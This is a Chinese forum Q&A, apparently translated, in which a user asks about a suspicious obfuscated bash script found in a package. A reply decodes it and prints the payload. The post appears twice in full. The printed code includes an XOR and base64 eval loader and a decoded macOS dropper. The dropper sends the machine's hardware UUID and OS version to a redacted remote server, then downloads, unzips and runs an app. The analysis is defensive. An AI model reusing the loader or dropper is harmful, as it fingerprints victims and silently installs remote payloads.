一个可疑的bash代码,谁能帮我解释一下?
A suspicious bash code, who can help me interpret it?
解压一个包,发现一段代码,因为我不擅长bash,不知如何是好,怀疑是恶意代码,谁能帮帮我解读一下。
#!/bin/bash
_l() {
_i=0;_x=0;
for ((_i=0; _i<${#1}; _i+=2)) do
__return_var="$__return_var$(printf "%02x" $(( ((0x${1:$_i:2})) ^ ((0x${2:$_x:2})) )) )"
if (( (_x+=2)>=${#2} )); then ((_x=0)); fi
done
if [[ "" ]]; then eval "='$__return_var'"; else echo -n "$__return_var"; fi
}
_m() {
_v=$(base64 --decode <(printf ""));_k=$(xxd -pu <(printf ""));
__return_var="$(xxd -r -p <(_l "$_v" "$_k"))"
if [[ "" ]]; then eval "='$__return_var'"; else echo -n "$__return_var"; fi
}
_y="8903139122"
_t="MWIxODFmNTE1ODVkMTY1MzUzNDE1MDE5M2EzOTc0N2Q3YTZlNjI3MzZiNmEwZDExMDkwYTA5MDIwMzAxMDEwODAyMDExMzM5Nzg2MTYyNmQ3Yzc2N2Q3Mjc4N2QwNDEzNDU0NTRmMTc1MTVlNTI1YTU3MWY0MTQyNTk1YTU1MTEzYjcyNjk2MTZkNjA3NzZjNjQ3NjBjMTE1ZDVlNDU1YzU0NTY1MTU3MWU1NzU1NDI0NjEwMzI0YzVlNDk1ODQzNjY0MTUzNDE0YjRlNWY0MTU1MGUxYjAzMDAwMzAxMGEwMTAwMDEwYTAxMDkwYjAyMGIwODAzMGEwMDAxMGIwODEwMzgzMjU2NDM2YzQ3NTY0YjQyNWI1ZDU2MDQxMjE3MTk0MDRlNmU0NDU3NGE0YTEwMWU0MTQxNTY1NTQ3NTE0YzZmNTU0MTQyNWE1NjVmMWIxMDE4MzM0MzU2NDI0MDUwNWU1YzZkNWY0YzU5NTcwYzExMWQxOTQ3NDc1MTVkNTc1NjVmMWExYjExMzg1ZjU5NWE1ODVhNWY1NjY2NTg1NjBmMWExZDE4NTY1MjViNTYxMTFmNWMxODFiMTQxYjU4NWM0YjU0NTUxMjE1NGI1NDAyMTExZTVhMTE3YjdkNjg1NTUxNDc1NzVjNGI1Yzc3NGE0ODVjNDI0Nzc1NTY0ZjU4NTE1NzE4NDUxMDU0NDM1NjQ5MTExZjVkMTgxZTEyN2E3ZTYzNTU1MDQ2NTQ1NzRiNWQ2NjY0N2E3ZDEzMTIwZjE4MWI2YzFiMWYxOTY1MTgxMDE1MTg0NTEwNDA1NDU3MTkxYzc3MTIxNTU3MTAxNDQyNzMxNzFiMTAxYTYzNjcxMjZlMWExYTFiNzE2ZTAzNzg0OTE3MWExMzEzNDUxMTQ2NDAxODE0NTQ1MDExMTQ2MjZhMDg0MjRhNTA1ZTQ3MGI2ZTY0MTYxYjEwMTgzMzNhNDY0MzVmMDQxMzVhNDY0YzQ5MGExYzFlMTc0MjcwNjI2MjY3N2Q3ZjdlNzA3YTc3NGMxZDE2NDM3ODYwNjM2ZTYxNzY2NDY2Nzc0NTA2NWQ1YTU1MGUxZDRhNWY1MzViNTE1OTVkNTQ2YzUwNTU0ZjE0NGIwNDE0NDg0MjU2NGE0MjViNWQ1NjY2NTc0NjU4NTc0NDE3NWQwZjFjNDI1ZjQwNmU0NTVjNDM0MTViNTc1NzRkMTU0MTBlMWQ0YTc3N2M3YjY2NjA3MjYyNjA0NDEzMzg0NjU1NDk2ZjQzNTA0NzUxMGMxMDE2MTA1NDViNDc1NDVlNDkxMTFkNDY1NTQ5MWY2YjY5NmI2MTY5NmE2YTYwNjExOTExM2I1MDRjNDM1ZTEyMTU1ZjAwN2YxMTExMWQ0YTQ3NDA1NDQ0MTIxMzBmMWM1ZDU0NDQxZDU2NGM1YzVmMTEwMTA3MTcwMzEyMDYwNzEwMTc0YTQ3NTQ0MTZkNDI1OTRkNTg0ZTExMzk1ODQxNDI2ZDVjNTA0MjBlMTMxNzExNWM1OTQ2NWQ1NDQwMTMxYzU3MTkxZTQ2NWY0ODE2Njg2YjY5NmI2MTY5NmE2YTExMTYxMjEzM2I0NjU3NGI1YjQyMTgxNDYwMTMxMzE3NDI0NDVjNDg1MTQ5NmY0MzUwNDA0YTQ2NWQ0MDVjNDQxMjEzMTMxNzQyNDU1ZjQyNjc0OTUxNDc1OTRlMWIxMTFmNTYxODFiMTQ0ODUwNDM0OTZlNTY1YjRhNDQxMjEzMGYxMzE2NTU1NzQ0MTc1NzQ1NWY1ZDEzMGIwZjE0MDMxODMzNDI1ZTExMWU1ZjExMTY0OTRjNTQ0MDZjNDE1MjRkNTk0ZjEyMzI1ZjU5NWY1NDZjNTc1MDVmNTcwNTFiMTQxYjU2NDE1YzQxMTIxZjU1MDgxMDFlNDcxMzFiMWIxYzUzNDg0OTEyMTMwZDFiNTU0MjEyMWYwOTE5MTIxNzRhNTI0OTQxNmQ1NjUxNGI0ZDExMTgxYTFiMTEzODQ0NTc1NTQ1NWU1NDZjNTc1MDVmNTcwNTFiMTQxYjU0NTA1MTVlMTIxZjU2MTkxMjE3NGE2MzZlNzU0ZjEwMTg0NTEwNDA1NDU3MTkxYzc3MTIxNTU3MTAxNDQyNzM2NzE5MWQ2NDU3NTU0NTVlNTQ0MDE2NmE2YzFkNjUxMjE5MWMxZjE5Nzk2ZDAzNzI0ODFlMTkxMTExMzk0ZjVlNWU0NzU1NWM2ZjVkNTA1ZTVjMGMxMDE2NDM0ZjVmNWY0NDVlNWM2ZTVjNTM1NTVjMWYxYzExMWMxYzAzMDI0ZjFhMTkzYTUwNTk1ZTU2NTUxMjE5NDAxOTEyMTc0YTUyNDk0MTZkNTY1MTRiNGQxNzRhNTU1MDVkNTc2ZDU2NTg1ZDU2NGMxYzdhNWU1YzQ2NWQ1NzQ0NDAxZTdlNTg1MjdkNjExYTE2MWExMzNiNWM0OTU0NWMxMjE1NTgxMDExMTU0ODU4NDE0MjZkNWM1MDQyNGUxNTQ4NWY1ODVlNTc2NzU3NTE1ZTU0NGUxYjExMWYxZjU5NGI1NzQwMTExMTRhMTMxMjEwMWM0MjQzNTY0MjQwNTA1ZTVjNmQ1ZjRjNTk1NzRjMTExOTEzMTY0OTRlNTY1YzQ2NWM1NjY2NWY1MzVmNWQ0NDEyMzkK"
eval "$(_m "$_t" "$_y")"
最上面的两个函数_l()和_m()读入了两个字符串_y和_t。 _t 包含混淆代码,_y 有点像钥匙。密钥逐个字母地应用于混淆代码,创建一个 base64 字符串,该字符串可以解码为 bash 程序,eval 命令可以执行该程序。
删除 eval 并回显像 echo "$(_m "$_t" "$_y")" 这样的结果吐出将由 eval 命令执行的代码。这是非常安全的,因为我们实际上并没有 eval现在执行混淆代码:
#!/bin/bash
ENC_PASS=<somepasswordhere>
APP_DOMAIN=<somewebsite>
APP_ROUTE="download/dlst"
unzip_password=<anotherpasswordhere>
os_version="$(sw_vers -productVersion)"
session_guid="$(uuidgen)"
machine_id="$(echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@@p')" | tr -dc '[[:print:]]')"
url="http://${APP_DOMAIN}/${APP_ROUTE}?mid=${machine_id}&s=${session_guid}&o=${os_version}&p=${ENC_PASS}"
tmp_path="$(mktemp /tmp/XXXXXXXXX)"
curl -f0L "${url}" >/dev/null 2>&1 >> ${tmp_path}
app_dir="$(mktemp -d /tmp/XXXXXXXX)/"
unzip -P "${unzip_password}" "${tmp_path}" -d "${app_dir}" > /dev/null 2>&1
rm -f ${tmp_path}
file_name="$(grep -m1 -v "*.app" <(ls -1 "${app_dir}"))"
volume_name="$(echo -n "${PWD}" | sed -E -n 's@^(/Volumes/[^/]+)/.*@@p')"
volume_name="${volume_name// /%20}"
chmod +x "${app_dir}${file_name}/Contents/MacOS"/*
open -a "${app_dir}${file_name}" --args "s" "${session_guid}" "${volume_name}"
我建议不要 运行。编辑以删除网站和密码 以防万一 这种混淆是由一些非常狡猾但愚蠢的开发人员完成的,实际上并不是恶意的......尽管这几乎肯定是恶意的。您可以 运行 不 eval 自己查看编辑后的位。
在较高级别,这会将您的补偿信息发送到服务器并下载一个 zip 文件。解压缩 zip 文件,使内容可执行,然后执行。由于 zip (duh) 中的 MacOS 子文件夹,这仅适用于 Mac,而且还使用 ioreg 程序收集存储在 machine_id 中的数据,这些数据被发送到远程服务器。
下一步是获取该 zip 文件并查看它的作用。不过我没有下载 ;)
解压一个包,发现一段代码,因为我不擅长bash,不知如何是好,怀疑是恶意代码,谁能帮帮我解读一下。
#!/bin/bash
_l() {
_i=0;_x=0;
for ((_i=0; _i<${#1}; _i+=2)) do
__return_var="$__return_var$(printf "%02x" $(( ((0x${1:$_i:2})) ^ ((0x${2:$_x:2})) )) )"
if (( (_x+=2)>=${#2} )); then ((_x=0)); fi
done
if [[ "" ]]; then eval "='$__return_var'"; else echo -n "$__return_var"; fi
}
_m() {
_v=$(base64 --decode <(printf ""));_k=$(xxd -pu <(printf ""));
__return_var="$(xxd -r -p <(_l "$_v" "$_k"))"
if [[ "" ]]; then eval "='$__return_var'"; else echo -n "$__return_var"; fi
}
_y="8903139122"
_t="MWIxODFmNTE1ODVkMTY1MzUzNDE1MDE5M2EzOTc0N2Q3YTZlNjI3MzZiNmEwZDExMDkwYTA5MDIwMzAxMDEwODAyMDExMzM5Nzg2MTYyNmQ3Yzc2N2Q3Mjc4N2QwNDEzNDU0NTRmMTc1MTVlNTI1YTU3MWY0MTQyNTk1YTU1MTEzYjcyNjk2MTZkNjA3NzZjNjQ3NjBjMTE1ZDVlNDU1YzU0NTY1MTU3MWU1NzU1NDI0NjEwMzI0YzVlNDk1ODQzNjY0MTUzNDE0YjRlNWY0MTU1MGUxYjAzMDAwMzAxMGEwMTAwMDEwYTAxMDkwYjAyMGIwODAzMGEwMDAxMGIwODEwMzgzMjU2NDM2YzQ3NTY0YjQyNWI1ZDU2MDQxMjE3MTk0MDRlNmU0NDU3NGE0YTEwMWU0MTQxNTY1NTQ3NTE0YzZmNTU0MTQyNWE1NjVmMWIxMDE4MzM0MzU2NDI0MDUwNWU1YzZkNWY0YzU5NTcwYzExMWQxOTQ3NDc1MTVkNTc1NjVmMWExYjExMzg1ZjU5NWE1ODVhNWY1NjY2NTg1NjBmMWExZDE4NTY1MjViNTYxMTFmNWMxODFiMTQxYjU4NWM0YjU0NTUxMjE1NGI1NDAyMTExZTVhMTE3YjdkNjg1NTUxNDc1NzVjNGI1Yzc3NGE0ODVjNDI0Nzc1NTY0ZjU4NTE1NzE4NDUxMDU0NDM1NjQ5MTExZjVkMTgxZTEyN2E3ZTYzNTU1MDQ2NTQ1NzRiNWQ2NjY0N2E3ZDEzMTIwZjE4MWI2YzFiMWYxOTY1MTgxMDE1MTg0NTEwNDA1NDU3MTkxYzc3MTIxNTU3MTAxNDQyNzMxNzFiMTAxYTYzNjcxMjZlMWExYTFiNzE2ZTAzNzg0OTE3MWExMzEzNDUxMTQ2NDAxODE0NTQ1MDExMTQ2MjZhMDg0MjRhNTA1ZTQ3MGI2ZTY0MTYxYjEwMTgzMzNhNDY0MzVmMDQxMzVhNDY0YzQ5MGExYzFlMTc0MjcwNjI2MjY3N2Q3ZjdlNzA3YTc3NGMxZDE2NDM3ODYwNjM2ZTYxNzY2NDY2Nzc0NTA2NWQ1YTU1MGUxZDRhNWY1MzViNTE1OTVkNTQ2YzUwNTU0ZjE0NGIwNDE0NDg0MjU2NGE0MjViNWQ1NjY2NTc0NjU4NTc0NDE3NWQwZjFjNDI1ZjQwNmU0NTVjNDM0MTViNTc1NzRkMTU0MTBlMWQ0YTc3N2M3YjY2NjA3MjYyNjA0NDEzMzg0NjU1NDk2ZjQzNTA0NzUxMGMxMDE2MTA1NDViNDc1NDVlNDkxMTFkNDY1NTQ5MWY2YjY5NmI2MTY5NmE2YTYwNjExOTExM2I1MDRjNDM1ZTEyMTU1ZjAwN2YxMTExMWQ0YTQ3NDA1NDQ0MTIxMzBmMWM1ZDU0NDQxZDU2NGM1YzVmMTEwMTA3MTcwMzEyMDYwNzEwMTc0YTQ3NTQ0MTZkNDI1OTRkNTg0ZTExMzk1ODQxNDI2ZDVjNTA0MjBlMTMxNzExNWM1OTQ2NWQ1NDQwMTMxYzU3MTkxZTQ2NWY0ODE2Njg2YjY5NmI2MTY5NmE2YTExMTYxMjEzM2I0NjU3NGI1YjQyMTgxNDYwMTMxMzE3NDI0NDVjNDg1MTQ5NmY0MzUwNDA0YTQ2NWQ0MDVjNDQxMjEzMTMxNzQyNDU1ZjQyNjc0OTUxNDc1OTRlMWIxMTFmNTYxODFiMTQ0ODUwNDM0OTZlNTY1YjRhNDQxMjEzMGYxMzE2NTU1NzQ0MTc1NzQ1NWY1ZDEzMGIwZjE0MDMxODMzNDI1ZTExMWU1ZjExMTY0OTRjNTQ0MDZjNDE1MjRkNTk0ZjEyMzI1ZjU5NWY1NDZjNTc1MDVmNTcwNTFiMTQxYjU2NDE1YzQxMTIxZjU1MDgxMDFlNDcxMzFiMWIxYzUzNDg0OTEyMTMwZDFiNTU0MjEyMWYwOTE5MTIxNzRhNTI0OTQxNmQ1NjUxNGI0ZDExMTgxYTFiMTEzODQ0NTc1NTQ1NWU1NDZjNTc1MDVmNTcwNTFiMTQxYjU0NTA1MTVlMTIxZjU2MTkxMjE3NGE2MzZlNzU0ZjEwMTg0NTEwNDA1NDU3MTkxYzc3MTIxNTU3MTAxNDQyNzM2NzE5MWQ2NDU3NTU0NTVlNTQ0MDE2NmE2YzFkNjUxMjE5MWMxZjE5Nzk2ZDAzNzI0ODFlMTkxMTExMzk0ZjVlNWU0NzU1NWM2ZjVkNTA1ZTVjMGMxMDE2NDM0ZjVmNWY0NDVlNWM2ZTVjNTM1NTVjMWYxYzExMWMxYzAzMDI0ZjFhMTkzYTUwNTk1ZTU2NTUxMjE5NDAxOTEyMTc0YTUyNDk0MTZkNTY1MTRiNGQxNzRhNTU1MDVkNTc2ZDU2NTg1ZDU2NGMxYzdhNWU1YzQ2NWQ1NzQ0NDAxZTdlNTg1MjdkNjExYTE2MWExMzNiNWM0OTU0NWMxMjE1NTgxMDExMTU0ODU4NDE0MjZkNWM1MDQyNGUxNTQ4NWY1ODVlNTc2NzU3NTE1ZTU0NGUxYjExMWYxZjU5NGI1NzQwMTExMTRhMTMxMjEwMWM0MjQzNTY0MjQwNTA1ZTVjNmQ1ZjRjNTk1NzRjMTExOTEzMTY0OTRlNTY1YzQ2NWM1NjY2NWY1MzVmNWQ0NDEyMzkK"
eval "$(_m "$_t" "$_y")"
最上面的两个函数_l()和_m()读入了两个字符串_y和_t。 _t 包含混淆代码,_y 有点像钥匙。密钥逐个字母地应用于混淆代码,创建一个 base64 字符串,该字符串可以解码为 bash 程序,eval 命令可以执行该程序。
删除 eval 并回显像 echo "$(_m "$_t" "$_y")" 这样的结果吐出将由 eval 命令执行的代码。这是非常安全的,因为我们实际上并没有 eval现在执行混淆代码:
#!/bin/bash
ENC_PASS=<somepasswordhere>
APP_DOMAIN=<somewebsite>
APP_ROUTE="download/dlst"
unzip_password=<anotherpasswordhere>
os_version="$(sw_vers -productVersion)"
session_guid="$(uuidgen)"
machine_id="$(echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@@p')" | tr -dc '[[:print:]]')"
url="http://${APP_DOMAIN}/${APP_ROUTE}?mid=${machine_id}&s=${session_guid}&o=${os_version}&p=${ENC_PASS}"
tmp_path="$(mktemp /tmp/XXXXXXXXX)"
curl -f0L "${url}" >/dev/null 2>&1 >> ${tmp_path}
app_dir="$(mktemp -d /tmp/XXXXXXXX)/"
unzip -P "${unzip_password}" "${tmp_path}" -d "${app_dir}" > /dev/null 2>&1
rm -f ${tmp_path}
file_name="$(grep -m1 -v "*.app" <(ls -1 "${app_dir}"))"
volume_name="$(echo -n "${PWD}" | sed -E -n 's@^(/Volumes/[^/]+)/.*@@p')"
volume_name="${volume_name// /%20}"
chmod +x "${app_dir}${file_name}/Contents/MacOS"/*
open -a "${app_dir}${file_name}" --args "s" "${session_guid}" "${volume_name}"
我建议不要 运行。编辑以删除网站和密码 以防万一 这种混淆是由一些非常狡猾但愚蠢的开发人员完成的,实际上并不是恶意的......尽管这几乎肯定是恶意的。您可以 运行 不 eval 自己查看编辑后的位。
在较高级别,这会将您的补偿信息发送到服务器并下载一个 zip 文件。解压缩 zip 文件,使内容可执行,然后执行。由于 zip (duh) 中的 MacOS 子文件夹,这仅适用于 Mac,而且还使用 ioreg 程序收集存储在 machine_id 中的数据,这些数据被发送到远程服务器。
下一步是获取该 zip 文件并查看它的作用。不过我没有下载 ;)